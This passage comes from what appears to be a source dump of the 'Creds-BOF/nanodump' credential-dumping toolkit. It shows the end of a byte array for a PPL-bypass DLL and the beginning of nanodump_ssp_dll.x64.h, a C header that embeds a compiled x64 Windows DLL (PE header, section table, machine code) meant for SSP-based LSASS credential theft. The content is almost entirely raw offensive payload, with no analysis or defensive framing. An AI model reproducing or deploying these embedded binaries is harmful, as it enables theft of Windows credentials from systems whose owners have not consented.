x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x00,0x00,0x0C,0x00,0x00,0x00,0x58,0xA1,0x00,0x00,0x00,0x00,0x01,0x00,0x14,0x00,0x00,0x00,0x10,0xA0,0x40,0xA0,0x50,0xA0,0x58,0xA0,0x60,0xA0,0x00,0x00,0x00,0x10,0x01,0x00,0x30,0x00,0x00,0x00,0x80,0xA7,0xA0,0xA7,0xA8,0xA7,0xB0,0xA7,0xB8,0xA7,0x40,0xA9,0x50,0xA9,0x60,0xA9,0x70,0xA9,0x80,0xA9,0x90,0xA9,0xA0,0xA9,0xB0,0xA9,0xC0,0xA9,0xD0,0xA9,0xE0,0xA9,0xF0,0xA9,0x00,0xAA,0x10,0xAA,0x00,0x00,0x00,0x90,0x01,0x00,0x10,0x00,0x00,0x00,0x18,0xA0,0x30,0xA0,0x38,0xA0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,};
unsigned int nanodump_ppl_medic_dll_len = 73216;


================================================
FILE: Creds-BOF/nanodump/include/nanodump_ssp_dll.x64.h
================================================
#pragma once

unsigned char nanodump_ssp_dll[] = {0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x64,0x86,0x0B,0x00,0x7C,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x00,0x2E,0x22,0x0B,0x02,0x02,0x29,0x00,0x72,0x00,0x00,0x00,0x9A,0x00,0x00,0x00,0x24,0x00,0x00,0x40,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x01,0x00,0x00,0x04,0x00,0x00,0x99,0xB2,0x00,0x00,0x03,0x00,0x60,0x01,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x4F,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x78,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x00,0x00,0x50,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x01,0x00,0x60,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0xA2,0x00,0x00,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x88,0x11,0x01,0x00,0x48,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x08,0x71,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x72,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x60,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x76,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0xC0,0x08,0x00,0x00,0x00,0xA0,0x00,0x00,0x00,0x0A,0x00,0x00,0x00,0x78,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x70,0x64,0x61,0x74,0x61,0x00,0x00,0x50,0x07,0x00,0x00,0x00,0xB0,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x82,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x78,0x64,0x61,0x74,0x61,0x00,0x00,0x48,0x05,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x8A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x62,0x73,0x73,0x00,0x00,0x00,0x00,0x90,0x23,0x00,0x00,0x00,0xD0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0xC0,0x2E,0x65,0x64,0x61,0x74,0x61,0x00,0x00,0x4F,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x69,0x64,0x61,0x74,0x61,0x00,0x00,0x78,0x05,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x06,0x00,0x00,0x00,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x43,0x52,0x54,0x00,0x00,0x00,0x00,0x58,0x00,0x00,0x00,0x00,0x20,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x98,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x74,0x6C,0x73,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x30,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x9A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x60,0x00,0x00,0x00,0x00,0x40,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x0D,0xF9,0xBF,0x00,0x00,0xE9,0x14,0x6E,0x00,0x00,0x0F,0x1F,0x40,0x00,0x55,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0x4D,0x89,0xC4,0x85,0xD2,0x0F,0x85,0x7F,0x00,0x00,0x00,0x8B,0x05,0xE1,0xBF,0x00,0x00,0x85,0xC0,0x7E,0x5E,0x83,0xE8,0x01,0x48,0x8B,0x1D,0x9B,0x94,0x00,0x00,0x45,0x31,0xE4,0xBF,0x01,0x00,0x00,0x00,0x89,0x05,0xC5,0xBF,0x00,0x00,0x4C,0x8B,0x2D,0x6E,0x01,0x01,0x00,0xEB,0x0C,0x0F,0x1F,0x40,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD5,0x4C,0x89,0xE0,0xF0,0x48,0x0F,0xB1,0x3B,0x48,0x89,0xC6,0x48,0x85,0xC0,0x75,0xE8,0x48,0x8B,0x3D,0x71,0x94,0x00,0x00,0x8B,0x07,0x83,0xF8,0x02,0x0F,0x84,0xC6,0x00,0x00,0x00,0xB9,0x1F,0x00,0x00,0x00,0xE8,0x04,0x6F,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x89,0xD0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFA,0x01,0x75,0xDF,0x65,0x48,0x8B,0x04,0x25,0x30,0x00,0x00,0x00,0x48,0x8B,0x1D,0x1B,0x94,0x00,0x00,0x48,0x8B,0x70,0x08,0x45,0x31,0xED,0x4C,0x8B,0x35,0xF5,0x00,0x01,0x00,0xEB,0x14,0x0F,0x1F,0x00,0x48,0x39,0xC6,0x0F,0x84,0x8F,0x00,0x00,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD6,0x4C,0x89,0xE8,0xF0,0x48,0x0F,0xB1,0x33,0x48,0x85,0xC0,0x75,0xE2,0x45,0x31,0xED,0x48,0x8B,0x35,0xF0,0x93,0x00,0x00,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0xC5,0x00,0x00,0x00,0x8B,0x06,0x85,0xC0,0x74,0x7F,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0x94,0x00,0x00,0x00,0x45,0x85,0xED,0x74,0x5F,0x48,0x8B,0x05,0x78,0x93,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x0D,0x4D,0x89,0xE0,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF9,0xFF,0xD0,0x83,0x05,0xD4,0xBE,0x00,0x00,0x01,0xBA,0x01,0x00,0x00,0x00,0xE9,0x4B,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8D,0x0D,0xA9,0xBE,0x00,0x00,0xE8,0xC4,0x6D,0x00,0x00,0xC7,0x07,0x00,0x00,0x00,0x00,0x48,0x87,0x33,0xE9,0x2A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x41,0xBD,0x01,0x00,0x00,0x00,0xEB,0x81,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x48,0x87,0x03,0xEB,0x9A,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x99,0x93,0x00,0x00,0x48,0x8B,0x0D,0x82,0x93,0x00,0x00,0xC7,0x06,0x01,0x00,0x00,0x00,0xE8,0xF7,0x6D,0x00,0x00,0xE9,0x63,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8B,0x15,0x59,0x93,0x00,0x00,0x48,0x8B,0x0D,0x42,0x93,0x00,0x00,0xE8,0xDD,0x6D,0x00,0x00,0xC7,0x06,0x02,0x00,0x00,0x00,0xE9,0x4E,0xFF,0xFF,0xFF,0x66,0x90,0xB9,0x1F,0x00,0x00,0x00,0xE8,0xBE,0x6D,0x00,0x00,0xE9,0x32,0xFF,0xFF,0xFF,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8B,0x25,0xD8,0x92,0x00,0x00,0x48,0x89,0xCE,0x41,0x89,0x14,0x24,0x89,0xD3,0x4C,0x89,0xC7,0x85,0xD2,0x75,0x60,0x8B,0x05,0x0A,0xBE,0x00,0x00,0x85,0xC0,0x74,0x36,0xE8,0x49,0x61,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x4B,0x5D,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0x7F,0x6B,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x41,0x89,0xC5,0xE8,0xCF,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x06,0x0F,0x1F,0x00,0x45,0x31,0xED,0x44,0x89,0xE8,0x41,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xE8,0xF3,0x60,0x00,0x00,0x8D,0x43,0xFF,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x83,0xF8,0x01,0x77,0x3B,0xE8,0x8E,0xFD,0xFF,0xFF,0x85,0xC0,0x74,0xC2,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0x1D,0x6B,0x00,0x00,0x85,0xC0,0x74,0x39,0x83,0xFB,0x01,0x74,0x54,0x49,0x89,0xF8,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0xC3,0x5C,0x00,0x00,0x41,0x89,0xC5,0xEB,0x9A,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0xB2,0x5C,0x00,0x00,0x41,0x89,0xC5,0x83,0xFB,0x03,0x75,0x86,0xE9,0x5A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFB,0x01,0x0F,0x85,0x6F,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x2A,0xFD,0xFF,0xFF,0xE9,0x5D,0xFF,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0xE8,0x9B,0x5D,0x00,0x00,0x49,0x89,0xF8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0x6A,0x5C,0x00,0x00,0x41,0x89,0xC5,0x85,0xC0,0x0F,0x85,0x3B,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x52,0x5C,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x86,0x6A,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xD9,0xFC,0xFF,0xFF,0xE9,0x0F,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0x48,0x8B,0x05,0x79,0x91,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0xE9,0x8E,0xFE,0xFF,0xFF,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x48,0x89,0xCA,0x48,0x8D,0x0D,0x96,0xBC,0x00,0x00,0xE9,0xD1,0x6A,0x00,0x00,0x90,0x48,0x8D,0x0D,0x09,0x00,0x00,0x00,0xE9,0xE4,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x66,0xFE,0x00,0x00,0xFF,0xD0,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x57,0x53,0x48,0x81,0xEC,0x60,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x02,0x00,0x00,0x48,0x89,0x95,0x08,0x02,0x00,0x00,0xC7,0x85,0xDC,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x85,0xD0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0xBD,0x00,0x02,0x00,0x00,0x00,0x0F,0x84,0x50,0x02,0x00,0x00,0x48,0x8B,0x95,0x00,0x02,0x00,0x00,0x48,0x8D,0x45,0xB0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8F,0x6B,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x95,0xC8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x40,0x1D,0x00,0x00,0x89,0x85,0xD8,0x01,0x00,0x00,0x81,0xBD,0xD8,0x01,0x00,0x00,0x1A,0x00,0x00,0x80,0x0F,0x84,0xF8,0x01,0x00,0x00,0x83,0xBD,0xD8,0x01,0x00,0x00,0x00,0x0F,0x88,0xEE,0x01,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x8D,0xBC,0x01,0x00,0x00,0x48,0x8D,0x95,0xC0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xB8,0x0E,0x00,0x00,0x89,0x85,0xDC,0x01,0x00,0x00,0x83,0xBD,0xDC,0x01,0x00,0x00,0x00,0x0F,0x84,0x9D,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x63,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x84,0x01,0x00,0x